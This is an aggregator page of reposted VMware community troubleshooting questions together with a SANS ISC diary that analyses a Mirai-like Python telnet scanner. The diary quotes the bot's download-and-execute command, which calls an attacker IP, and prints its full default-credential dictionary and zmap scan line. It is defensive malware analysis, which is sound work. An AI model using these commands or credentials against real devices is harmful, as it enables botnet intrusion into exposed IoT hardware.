Server public key is 2048 bit

Secure Renegotiation IS supported

Compression: NONE

Expansion: NONE

No ALPN negotiated

SSL-Session:

    Protocol  : TLSv1.2

    Cipher    : ECDHE-RSA-AES256-GCM-SHA384

    Session-ID: XXXXXXXXXXXXXXXXXXXXXXXXXXXX

    Session-ID-ctx:

    Master-Key: XXXXXXXXXXXXXXXXXXXXXXXXXXXX

    PSK identity: None

    PSK identity hint: None

    SRP username: None

    Start Time: 1603185518

    Timeout   : 7200 (sec)

    Verify return code: 21 (unable to verify the first certificate)

    Extended master secret: yes

read:errno=0

 

 

 

I made bold some possible errors/issues. The problem looks quite similar with the one I am dealing with but still couldn’t find any solution yet. Any help would be much appreciated.

vRA 8.2 – Custom role and cloud templates

This post was originally published on this site

Hello,

 

I discovered the new feature “custom role” and it’s great ! That’s exactly what I need but I have an issue and I would like to know if I use it correctly.

 

I created a custom role names “Deployer” which allows :

– View deployments

– Deploy Cloud Templates

I want this role to be able to deploy cloud templates (blueprints) and see the status of deployments.

 

When I login with a user with this role, I only see deployments and cloud templates, that’s great.

My issue is : In the “design” table, where the cloud templates are located, I can also “create” a cloud template ! And I don’t want to role to be able to do this. Only admin will be able to create new cloud templates.

Is it a “bug” or I’m not using it correctly ?

 

Thank you in advance.

 

Best regards.

Cloud Director 10.2 – unable to edit vmnic as admin and tenant

This post was originally published on this site

I already opened a support case, but am curious if anyone has experienced the same:

We deployed 2 brand new instances of the just released VCD 10.2 in our lab and upgraded a 10.1.1 to 10.2 to have a comparison between the 2 states.

When we tried the new features like crossVDC networking, distributed firewalling, etc., everything went fine.

But when we tried to edit the network settings of an existing standalone VM, the edit window just kept loading and we are unable to edit the network cards.

This does not happen, as long as the VM is part of a vAPP.

 

Does anyone have the same problem and a fast solution for it?

vcd_nic_edit_problem.PNG

Citrix Workspace iOS App causing overload on UAG with per App Tunnel

This post was originally published on this site

Hi,

 

we are facing a Problem with Citrix Workspace App on iOS Devices.

iOS Citrix Workspace App is used for VDI Sessions via per App VPN over vmWare Tunnel on UAG 2009.

 

 

After the Citrix Workspace App was updated 2 weeks ago to version 20.09.5, we noticed that the vpn service on the UAG hung up about 2-3 times a day. The vpnd Service is still running but the UAG can’t accept new connections because the number of Sockets Connections on the UAG is steady increasing until it is over 65000 open UDP Socket connections.
If we connect with one device in a test environment and start the Citrix Workspace App with Tunnel we see that only one device is creating up to 40 connections.
On the Prod UAG we are running in this overload even if we only have 200 device connected.

 

Does someone else see this kind of problems with the app or does anybody else using this solution?

Mirai-alike Python Scanner, (Tue, Oct 20th)

This post was originally published on this site

Last week, I found an interesting Python script that behaves like a Mirai bot[1]. It scans for vulnerable devices exposing their telnet (TCP/23) interface in the wild, then tries to connect using a dictionary of credentials. The script has been uploaded to VT and has a low score of 2/59[2]. Indeed, it does not contain suspicious strings nor API calls. Just a simple but powerful scanner.

Here are the commands injected when a device is found with vulnerable credentials:

rekdevice = "cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://45.148.10.84/bins.sh; chmod 777 bins.sh; sh bins.sh; tftp 45.148.10.84 -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g 45.148.10.84; chmod 777 tftp2.sh; sh tftp2.sh; ftpget -v -u anonymous -p anonymous -P 21 45.148.10.84 ftp1.sh ftp1.sh; sh ftp1.sh tftp1.sh tftp2.sh ftp1.sh" #command to send

The IP address %%ip:45.148.10.84%% is offline at the moment but has already a bad reputation and is present in multiple blocklists.

Here is the list of credential pairs tested:

combo = [
        "root:root",
        "root:",
        "admin:admin",
        "telnet:telnet",
        "support:support",
        "user:user",
        "admin:",
        "admin:password",
        "root:vizxv",
        "root:admin",
        "root:xc3511",
        "root:888888",
        "root:xmhdipc",
        "root:default",
        "root:juantech",
        "root:123456",
        "root:54321",
        "root:12345",
        "root:pass",
        "ubnt:ubnt",
        "root:klv1234",
        "root:Zte521",
        "root:hi3518",
        "root:jvbzd",
        "root:anko",
        "root:zlxx.",
        "root:7ujMko0vizxv",
        "root:7ujMko0admin",
        "root:system",
        "root:ikwb",
        "root:dreambox",
        "root:user",
        "root:realtek",
        "root:00000000",
        "admin:1111111",
        "admin:1234",
        "admin:12345",
        "admin:54321",
        "admin:123456",
        "admin:7ujMko0admin",
        "admin:1234",
        "admin:pass",
        "admin:meinsm",
        "admin:admin1234",
        "root:1111",
        "admin:smcadmin",
        "admin:1111",
        "root:666666",
        "root:password",
        "root:1234",
        "root:klv123",
        "Administrator:admin",
        "service:service",
        "supervisor:supervisor",
        "guest:guest",
        "guest:12345",
        "guest:12345",
        "admin1:password",
        "administrator:1234",
        "666666:666666",
        "888888:888888",
        "tech:tech",
        "mother:fucker"
]

The script is pretty well written and is multi-threaded to speed up the scan:

for l in xrange(threads):
    try:
        t = threading.Thread(target=worker)
        t.start()
    except:
        pass

The script does not implement a random IP address generator, it just uses the zmap[3] scanner:

zmap -p23 -N 10000 -f saddr -q --verbosity=0

This command will return 10000 IP addresses that expose a telnet port. 

The question that arises when you find this kind of script is: "Can we really find so many devices exposing a telnet interface into the wild in 2020?". I did my own test and launched the above zmap command. In a few seconds, 10K IP addresses were returned. Then, I used the nmap scanner with the 'banner' script to grab telnet banners:

nmap -sC --script=banner -p 23 -Pn -iL open-telnet.txt -oA telnet-banners -v -n

I found a lot of banners that disclose the type of devices (routers, WiFi access points, switches, VoIP gateways, IoT, …). More interesting, a found some devices still bricked by the BrickerBot:

# telnet x.x.x.x
Trying x.x.x.x...
Connected to x.x.x.x.
Escape character is '^]'.

Internet Chemotherapy Part 11 - BrickerBot (TM) Source Drop (7/31 2020):
  hxxp://depastedihrn3jtw[.]onion/show.php?md5=20735856837081a18e6f0edf2c1e8d76

Internet Chemotherapy Part 12 - Third Time is the Charm? (9/6 2020)
  hxxp://depastedihrn3jtw[.]onion/show.php?md5=4c17df6b30ed2704082465d9a1c4ea86

DeepPaste is temperamental (unreachable 75% of time) so if the links are not
loading then try again later.

Update 10/3: So I have been looking into reconditioning Tenda/Intelbras, Genexis and Zte routers..
             Still WIP but seen some positive impact over the last few days/weeks.
Update 10/6: ..and Totolink.. 10/9: some new tricks for netis, TVT and Tata Consulting.. what next?
Update 10/17: Getting in the Zhone.. seeing real IoT action in 2020 at last

(none) login:

I found plenty of notifications and disclaimers warning you that connecting to the device is prohibited, your IP will be logged, etc. Please, don't waste your time to implement such unuseful banners, just get rid of telnet!

[1] https://www.cyber.nj.gov/threat-center/threat-profiles/botnet-variants/mirai-botnet
[2] https://www.virustotal.com/gui/file/89daf232e0658103883fa05b8968093675b5aa4b6be3fdbd46757144095daf64/details
[3] https://github.com/zmap/zmap

Xavier Mertens (@xme)
Senior ISC Handler – Freelance Cyber Security Consultant
PGP Key

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

vcsa update to 7.0u1 Returning from install(), data conversion failed post install hook failed

This post was originally published on this site

I just upgraded to 7.0 u1 from 7.0 and it appears to be fine except the applmgmt gui keeps displaying this:

 

 

And appears to be stuck.

 

Yet All logs appear normal with no errors and all services are running.  vcenter says 7.0.1.:

 

root@vc6 [ /var/log/vmware ]# vpxd -v

VMware VirtualCenter 7.0.1 build-16858589

 

Running:

applmgmt lookupsvc lwsmd observability observability-vapi pschealth vlcm vmafdd vmcad vmdird vmonapi vmware-analytics vmware-certificateauthority vmware-certificatemanagement vmware-cis-license vmware-content-library vmware-eam vmware-envoy vmware-hvc vmware-infraprofile vmware-perfcharts vmware-pod vmware-postgres-archiver vmware-rbd-watchdog vmware-rhttpproxy vmware-sca vmware-sps vmware-statsmonitor vmware-stsd vmware-topologysvc vmware-trustmanagement vmware-updatemgr vmware-vapi-endpoint vmware-vdtc vmware-vmon vmware-vpostgres vmware-vpxd vmware-vpxd-svcs vmware-vsan-health vmware-vsm vsphere-ui vstats vtsdb wcp

Stopped:

vmcam vmware-imagebuilder vmware-netdumper vmware-vcha

 

I see in the log /var/log/vmware/applmgmt/update_microservice.log the following:

 

2020-10-20 01:18:45,451 – 59346 -        update_script::_executePatchRunnerAndSupplyUserData: 127 -    ERROR – Patch command patch failed

2020-10-20 01:18:45,460 – 59346 -        update_script::                _reportFailure: 159 -    DEBUG – Error status has been already reported

2020-10-20 01:18:45,464 – 59346 -           extensions::                      __call__: 107 -    DEBUG – The component script returned ‘None’

2020-10-20 01:18:45,523 – 17819 -           update_b2b::                _runScriptHook: 344 -    DEBUG – update script result file ‘{n    “end_time”: “2020-10-20T01:18:45.232Z”,n    “error”: {n        “componentKey”: “last_component:Patch”,n        “detail”: [n            {n                “id”: “ur.services.start.text”,n                “localized”: “Failed to start all services after successful patching.”,n                “translatable”: “Failed to start all services after successful patching.”n            }n        ],n        “problemId”: null,n        “resolution”: nulln    },n    “info”: [],n    “progress”: 47,n    “progress_message”: {n        “componentKey”: “last_component:Patch”,n        “detail”: [n            {n                “id”: “ur.services.start.text”,n                “localized”: “Failed to start all services after successful patching.”,n                “translatable”: “Failed to start all services after successful patching.”n            }n        ],n        “problemId”: null,n        “resolution”: nulln    },n    “question”: null,n    “start_time”: “2020-10-20T00:41:48.003Z”,n    “status”: “error”,n    “warning”: [n        {n            “msg”: {n                “id”: “ur.services.retry.start.text”,n                “localized”: “Failed to start all services, will retry operation.”,n                “translatable”: “Failed to start all services, will retry operation.”n            },n            “problemId”: null,n            “resolution”: nulln        }n    ]n}’

2020-10-20 01:18:45,537 – 17819 -           update_b2b::                _runScriptHook: 362 -    DEBUG – Returning notifications {‘errors’: [{‘id’: ‘com.vmware.apliance.noid’, ‘time’: ‘2020-10-20T01:18:45.537Z’, ‘message’: {‘id’: ‘ur.services.start.text’, ‘default_message’: ‘Failed to start all services after successful patching.’, ‘args’: []}, ‘resolution’: None}], ‘info’: [], ‘warnings’: [{‘id’: ‘com.vmware.appliance.noid’, ‘time’: ‘2020-10-20T01:18:45.536Z’, ‘message’: {‘id’: ‘ur.services.retry.start.text’, ‘default_message’: ‘Failed to start all services, will retry operation.’, ‘args’: []}, ‘resolution’: None}]} from _runScriptHook

2020-10-20 01:18:45,537 – 17819 -           update_b2b::                       install:2265 -    DEBUG – PostInstall errors: [{‘id’: ‘com.vmware.apliance.noid’, ‘time’: ‘2020-10-20T01:18:45.537Z’, ‘message’: {‘id’: ‘ur.services.start.text’, ‘default_message’: ‘Failed to start all services after successful patching.’, ‘args’: []}, ‘resolution’: None}]

2020-10-20 01:18:45,544 – 17819 -         task_manager::                        update:  79 -    DEBUG – UpdateTask: status=FAILED, progress=80, message={‘id’: ‘com.vmware.appliance.postinstall_errors’, ‘default_message’: ‘Data conversion/Post install hook failed’, ‘args’: []}

2020-10-20 01:18:45,664 – 17819 -          dbfunctions::                    executeDML:  54 -    DEBUG – Executing Query {INSERT INTO progress VALUES(NULL, ?,         DATETIME(‘now’), ?, ?, ?)} with parameters (‘failed’, ‘Installation failed’, 100, 95)

2020-10-20 01:18:45,684 – 17819 -           update_b2b::                       install:2272 -    DEBUG – Returning from install(), data conversion failed

 

Did the upgrade work?  It apear to have but the dialog will not go away.  If it is okay how can I reset this so the dialog goes away and the alliance management interface UI is usable again?

 

I have a snapshot and could rollback.

 

Regards,

 

dion

PowerCLI 12.1 – Set-VM revert snapshot error: Required privilege 'System.Read' on managed object with id 'OptionManager-VpxSettings'

This post was originally published on this site

Hello,
with PowerCLI 12.1 we get an error when we revert to a snapshot with Set-VM -Snapshot if the user has only permission to a vm or a folder with vms.

Connect-VIServer vcenter -User userA
$vm = Get-Vm "vm01"
$snapshot = Get-Snapshot -VM $vm -Name "tmp"
Set-Vm -VM $vm -Snapshot $snapshot -Confirm:$false
Set-Vm : 20.10.2020 08:08:08    Set-VM          Failed to get Lookup Service information for this vCenter server. Details:
Permission to perform this operation was denied. Required privilege 'System.Read' on managed object with id
'OptionManager-VpxSettings'.'
At line:1 char:1
+ Set-Vm -VM $vm -Snapshot $snapshot -Confirm:$false
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo          : InvalidOperation: (:) [Set-VM], VimException
+ FullyQualifiedErrorId : ViCore_ConnectivityServiceImpl_GetLookupServiceClient_NoClient,VMware.VimAutomation.ViCo
re.Cmdlets.Commands.SetVM

I have try it with PowerCLI 12.0 and didn’t get this error.

I have olso try it with PowerCLI 12.1 and an other user who has permissions on the level of vcenter and get no error.

 

Can please watch a PowerCLI developer in the code and try to fix this?

 

Regards Maik

Remove-Harddisk

This post was originally published on this site

Good morning,

 

I decided to see if I can automate removal og RDMs from a Windows cluster node in order to migrate.

This turned out not to be difficult at all, and the following works:

 

Get-VM node02 | Get-HardDisk -DiskType RawPhysical, RawVirtual | Remove-HardDisk -Confirm:$false

 

The problem is that this command also deletes the SCSI controllers.

 

Is there a way to remove the RDM pointers/disks and still keep the SCSI controllers?

Iron Castle Systems